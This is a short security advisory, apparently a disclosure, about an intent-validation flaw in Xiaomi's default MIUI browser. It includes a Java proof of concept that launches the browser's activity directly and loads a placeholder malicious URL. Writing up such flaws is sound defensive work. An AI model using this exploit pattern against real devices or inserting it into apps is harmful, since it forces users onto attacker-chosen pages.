
Relatório técnico sobre vulnerabilidade crítica da Xiaomi
Relatório técnico sobre vulnerabilidade crítica da Xiaomi
Vulnerability Summary
A vulnerability was discovered in Xiaomi's default browser (com.android.browser) on various MIUI devices. The app fails to properly validate intents passed via startActivity, allowing malicious apps to open arbitrary URLs or perform unintended actions.
Intent intent = new Intent();
intent.setComponent(new ComponentName("com.android.browser", "com.android.browser.BrowserActivity"));
intent.setData(Uri.parse("http://malicious.com"));
startActivity(intent);